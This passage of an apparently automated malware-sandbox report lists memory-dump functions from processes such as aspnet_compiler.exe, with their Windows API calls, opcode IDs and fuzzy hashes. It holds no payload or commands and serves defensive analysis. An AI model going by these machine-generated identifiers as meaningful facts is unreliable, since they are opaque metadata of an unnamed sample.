                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61a69b279baa13be9733ddc65d8273f009cbc382d68b140ea122244810d3b0a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68810B62F1DB870FEBB9A72D88612747AC1DF97650B4880BED45EC71C7FD18AC054282
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB0E0D, Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-106596294
                                                                                                                                                                                                                    • Opcode ID: a9c929ec8c3e20aad84b722400a23475e85e0349a6a0ee5d2c3ac67129eedf58
                                                                                                                                                                                                                    • Instruction ID: 66ee3f80cf1f9d450281761167038e5c7dde3b52710b93346c76d66badfbf25c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9c929ec8c3e20aad84b722400a23475e85e0349a6a0ee5d2c3ac67129eedf58
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85313A62F0DB461FFBB9A72988612747AC2DF97690B8880FDD45DC32C7FC199C054282
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB2BF4, Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-106596294
                                                                                                                                                                                                                    • Opcode ID: d9c2b30159f7567e325a01460701bab84939e2ebbe28a19404b38412f43f66b9
                                                                                                                                                                                                                    • Instruction ID: dde86c48921f8d349b4c0e89161f538d8dfa78b9516bddf83a81b6d512c13809
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9c2b30159f7567e325a01460701bab84939e2ebbe28a19404b38412f43f66b9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B21E472E0DB461FE7A9A729C9553747AC2EF86251B4840FAD06DC7293FD19EC054382
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB1CF6, Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI$gwI
                                                                                                                                                                                                                    • API String ID: 0-106596294
                                                                                                                                                                                                                    • Opcode ID: c16a283b83d95dd75009e33093e47d65df4c0bf3f92dd9eb754efeff9eb1e849
                                                                                                                                                                                                                    • Instruction ID: c2760623bd1d7759791368b09172b44042b1bb2c50b44b462c0b12c48239e52c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c16a283b83d95dd75009e33093e47d65df4c0bf3f92dd9eb754efeff9eb1e849
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18110D61F0DA061FFBADAB1E946037865C2DFDA391B4840BED51DC32CBFC189C054246
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB2759, Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gwI
                                                                                                                                                                                                                    • API String ID: 0-163171030
                                                                                                                                                                                                                    • Opcode ID: 7f8f02bfab34045668668e93150080d760eb52d4db173c49a3fb37bf60e43614
                                                                                                                                                                                                                    • Instruction ID: 454f506786e260da9ee201f391bfd2274a4c602e5efa12ab0f2264263e1f8589
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f8f02bfab34045668668e93150080d760eb52d4db173c49a3fb37bf60e43614
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B213872E0DB860FE769A72AD96527876C1DF46210B4840FED05EC72D3FD08AC058347
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDBB1234, Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487577969.00007FFAEDBB0000.00000040.00000001.sdmp, Offset: 00007FFAEDBB0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2308946340ff963d42466a78b888421e66a4ba387c350cc67562c228747d4739
                                                                                                                                                                                                                    • Instruction ID: a71e94a886b96f01de7525c5054b363602f145cfd9cffac7593e2a04c88edd87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2308946340ff963d42466a78b888421e66a4ba387c350cc67562c228747d4739
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39318F3160CA499FDF0DEA1DD491D7077E1EB7639071441AED04ACB2E3EE22E885CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00007FFAEDAE1755, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487488170.00007FFAEDAE0000.00000040.00000001.sdmp, Offset: 00007FFAEDAE0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8fa052b133fb285199250cb97bb6871bff6ab814384497e7beb671718c6e8ece
                                                                                                                                                                                                                    • Instruction ID: e2caf24fffe966e9e5437b68a27909e16f406b3c56ac9661a16e3d5e9c12e6c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa052b133fb285199250cb97bb6871bff6ab814384497e7beb671718c6e8ece
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6101677125CB0C4FD744EF0CE451AA6B7E0FB99324F50056DE58AC3691DB36E881CB46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 00007FFAEDAE0E57, Relevance: .5, Instructions: 511COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.487488170.00007FFAEDAE0000.00000040.00000001.sdmp, Offset: 00007FFAEDAE0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: bff00b9012cdca843a7ed671b0a212c29d79c8a04f69e8608b9b6cbe187b5ca3
                                                                                                                                                                                                                    • Instruction ID: 777b6203522e4ee91d8752d34e0241710f26951896b8aa1af1ba540bd61a353f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bff00b9012cdca843a7ed671b0a212c29d79c8a04f69e8608b9b6cbe187b5ca3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA1B557A0D7E29FE312A76D98A51E53F60DF5322470900FBD4A8CB0D3F908594AC3A3
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Analysis Process: aspnet_compiler.exe PID: 6396 Parent PID: 3680 aspnet_compiler.exeCOMMON

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 02AC617C, Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 02AC6252
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000017.00000002.470576978.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                    • Opcode ID: bdc9b8d13d125194b73818d5e405caf58a8b0e76cb5b2cbec4aad7675ec91786
                                                                                                                                                                                                                    • Instruction ID: 02f961aa0d48ac6f44870044d99107742f5d38eebce29859eb6f565822db8f56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdc9b8d13d125194b73818d5e405caf58a8b0e76cb5b2cbec4aad7675ec91786
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C4145B0D042499FDB14CFA9C8847DEFBF5AB88B14F24812DE815A7345DB789849CF82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02AC3614, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 02AC6252
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000017.00000002.470576978.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                    • Opcode ID: 7784d6d5b9b3d87bde8a10234084d4fe2afb875669bdf5b48f9de0302ffada0d
                                                                                                                                                                                                                    • Instruction ID: ff34e37c6e64e426b9e962911f43dcf2806db5a16373f174f98da5866bc4be32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7784d6d5b9b3d87bde8a10234084d4fe2afb875669bdf5b48f9de0302ffada0d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D3133B0D042499FDB14CFA9C88479EFBF5AB88714F24812DE815A7385DB789845CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Analysis Process: aspnet_compiler.exe PID: 6800 Parent PID: 3680 aspnet_compiler.exeCOMMON

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 0141ADC0, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0141AE30
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0141AE6D
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0141AEAA
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0141AF03
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                    • Opcode ID: ebf6f11b00f99735b3df77aa89ae149ccbe67e4df3763f07f8648f115c1b1e3e
                                                                                                                                                                                                                    • Instruction ID: ee5458a266ea9e802e5ebf8bf1fd571b70456ce564dc228894b5f80a32a46730
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebf6f11b00f99735b3df77aa89ae149ccbe67e4df3763f07f8648f115c1b1e3e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C5164B09017898FDB14CFAAD9487EEFBF1AF48314F24849AE419A73A1D7345844CF66
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141ADD0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0141AE30
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0141AE6D
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0141AEAA
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0141AF03
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                    • Opcode ID: 60d368020a747ffa32444e9c8ed04004778aaef9f8057ff156ff23c2006d417d
                                                                                                                                                                                                                    • Instruction ID: bb70a3611af49e93e124f9faa0414e92b310a9359713ad79859737a9de00d667
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d368020a747ffa32444e9c8ed04004778aaef9f8057ff156ff23c2006d417d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 225156B0901749CFDB14DFAAD9487AEFBF1AF48314F20845AE519A7360D7345844CF66
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 014189E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01418C2E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: 16604a03c5c750f98774a1504a42557be3f2a9457d0ebb95b96e3276d7943533
                                                                                                                                                                                                                    • Instruction ID: 51413e5eed528a1ec5931a5a1ea212a3793a71108f8e73ca24ab58ac31af2525
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16604a03c5c750f98774a1504a42557be3f2a9457d0ebb95b96e3276d7943533
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9712471A00B068FD724CF6AD4457ABBBF1BF88244F00892ED54ADBB54D735E8468F91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141F2EC, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0141F40A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                    • Opcode ID: a53953268e829a42236e294400216f39a49b2d934ced258df9aac8e2cd3c11d0
                                                                                                                                                                                                                    • Instruction ID: d845f935a97c0590e32b9482529b0f9992faa35a9bc25e821ddfa94711fadcd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a53953268e829a42236e294400216f39a49b2d934ced258df9aac8e2cd3c11d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE51A2B1D003499FDF14CF99C884ADEBFB5BF48314F25812AE519AB214D774994ACF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141F2F8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0141F40A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                    • Opcode ID: df6d1ece65c738d178ee81cf2a3fd66a9fe20573dbbd66c23f347c6748781fa5
                                                                                                                                                                                                                    • Instruction ID: a28f23feb19507c6f7c20984569b4eaaa6d11cdbb9774f82008985980eb7f9e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df6d1ece65c738d178ee81cf2a3fd66a9fe20573dbbd66c23f347c6748781fa5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB41A2B1D00309DFDF14CF9AC884ADEBBB5BF48314F25812AE919AB214D7749949CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141AFF0, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141B07F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                    • Opcode ID: bf5812eb3d3c90bc1fefecd61cc940fc53712652bd6c6bf2a248692060430aeb
                                                                                                                                                                                                                    • Instruction ID: da281e1b62786a550d7ae6c987027cb523ab51c039383f6764cb2b7df513eac2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf5812eb3d3c90bc1fefecd61cc940fc53712652bd6c6bf2a248692060430aeb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 312103B5D00208AFDB10CFAAD484AEEBFF5EB48324F14801AE958B3310D375A955CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141AFF8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0141B07F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                                                                    • Opcode ID: 13d3229aae89b5d31002bac7fb87baeaac49a99a6d9aded004064bd26b4c741e
                                                                                                                                                                                                                    • Instruction ID: 0a54e8a70a6e89d4d23f9593d1635616c7e9a1b430049097ef19fe77bb376a03
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d3229aae89b5d31002bac7fb87baeaac49a99a6d9aded004064bd26b4c741e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221C2B5D002099FDB10CFAAD984ADEFFF8EB48324F14841AE958A7310D374A954CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 01418C60, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014190A9,00000800,00000000,00000000), ref: 014192BA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                    • Opcode ID: 3ffa7aef2fb91c9b6e479063dafd8eadf204de13d8c996da1d2c1a09d1f65696
                                                                                                                                                                                                                    • Instruction ID: c0893d1ab1414408519af47932f2ea61aadc25ddf93f33f5ea0394450e2a2287
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ffa7aef2fb91c9b6e479063dafd8eadf204de13d8c996da1d2c1a09d1f65696
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 161103B69002098FDB10CF9AC444BDEFBF4AB88314F05842AD515B7310C374A945CFA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 01419249, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014190A9,00000800,00000000,00000000), ref: 014192BA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                    • Opcode ID: c815365db14ac58a533629e54a74f254a406531b0c2a7aee846fedaa99bbc2e4
                                                                                                                                                                                                                    • Instruction ID: c828cb3ff0eb7eeb5b07293bb7ae96787b96652a60b8efbfa822e2862211816e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c815365db14ac58a533629e54a74f254a406531b0c2a7aee846fedaa99bbc2e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 811114B6D002098FDB10CF9AD484ADEFBF4AB88314F14852AD815A7710C374A945CFA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 014174DA, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0141754D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                                                    • Opcode ID: f36c0c57008185a4fbf9db1eb6fbb3ec52c792d1966c3d420f1344a2f45dd0f8
                                                                                                                                                                                                                    • Instruction ID: 21be2d7aa4ce395b932219a9774a1a4975d929fb612c3eacdf69c7e25b7b23bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f36c0c57008185a4fbf9db1eb6fbb3ec52c792d1966c3d420f1344a2f45dd0f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1021CD71C443948FDB11CF5AD5053EABFF4AB05314F44849AD495A7382D3389688CFA2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 01418BC1, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01418C2E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: b3639b6065f77c99c1b49eddc1ce20efb209d57f925e9c8c65e8cbf7eccea7ff
                                                                                                                                                                                                                    • Instruction ID: 70f76c79a2c97d2c65d3cfcc925fd9470435dde83ee0181ad43f8e1a228cd424
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3639b6065f77c99c1b49eddc1ce20efb209d57f925e9c8c65e8cbf7eccea7ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 251123B1C016498FDB20CFAAC584ADEFBF4AF88324F14855AC859A7210D374A546CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 01418BC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01418C2E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                    • Opcode ID: 18fc5b94992a1f240a98444fd03d6a640647b09f69c857069e561bf2955b7039
                                                                                                                                                                                                                    • Instruction ID: 674471b118e406b5f2aeb2847f15e90f5a9209333569168853aab2e263a3b338
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18fc5b94992a1f240a98444fd03d6a640647b09f69c857069e561bf2955b7039
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13110FB6D016098FDB10CF9AC444ADEFBF4AB88224F10841AD829A7214D374A546CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141D594, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0141F59D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000019.00000002.469014529.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                                                                                                    • Opcode ID: 35f27974d2577e144b6727c7bdba74e5adbfc7a997c31b6f133da3bfb9efa861
                                                                                                                                                                                                                    • Instruction ID: db8a9e142e696dd65d0adfdd4099075cad8204cf0d09c07c42e9e38bfd49a8a4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35f27974d2577e144b6727c7bdba74e5adbfc7a997c31b6f133da3bfb9efa861
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C11E0B59006099FDB10DF9AD588B9AFBF8EB48324F10841AE915A7701D374A949CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0141F538, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
